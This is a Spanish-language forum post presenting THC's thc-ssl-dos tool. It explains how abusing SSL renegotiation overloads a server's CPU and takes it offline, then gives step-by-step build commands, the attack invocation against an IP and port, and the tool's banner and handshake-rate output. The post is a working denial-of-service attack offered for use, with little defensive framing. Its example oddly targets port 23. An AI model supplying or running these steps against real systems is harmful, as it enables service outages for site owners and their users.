Al realizar una conexion "segura" mediante este protocolo se utiliza
x15 mas de procesamiento que en una conexion normal en el servidor cliente.
Lo que hace esta herramienta se aprovecha de este "fallo" y sigiendo las propiedades
asimetricas por la sobrecarga del servidor, lo deja off.
Afecta a todo lo que utilize SSL y se sabe de este problema desde el 2003.
Un dato que es interesante es que utiliza 10-25% del cpu!
Entonces esta herramienta creada por el equipo de Hydra explota la renegociacion "segura"
obteniendo miles de handshakes, por medio de una unica conexion TCP "aprox 300 o mas /s"
Como utilizar:
Descargan descomprimen donde quieran y navegan hasta el dir donde esta
Lanzan
Código: Seleccionar todo
./configureCódigo: Seleccionar todo
apt-get install libssl-devCódigo: Seleccionar todo
./configureCódigo: Seleccionar todo
make install allCódigo: Seleccionar todo
cd srcCódigo: Seleccionar todo
thc-ssl-dos direcionIP puertoCódigo: Seleccionar todo
thc-ssl-dos 192.168.0.1 23
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 87 [66.32 h/s], 96 Conn, 0 Err
Handshakes 156 [81.12 h/s], 97 Conn, 0 Err
Handshakes 230 [84.01 h/s], 100 Conn, 0 Err
Handshakes 402 [84.43 h/s], 100 Conn, 0 Err
Handshakes 496 [82.67 h/s], 100 Conn, 0 Err
Windows (binarios):
[Enlace externo eliminado para invitados]
Linux:
[Enlace externo eliminado para invitados]
Mas informacion [Enlace externo eliminado para invitados]
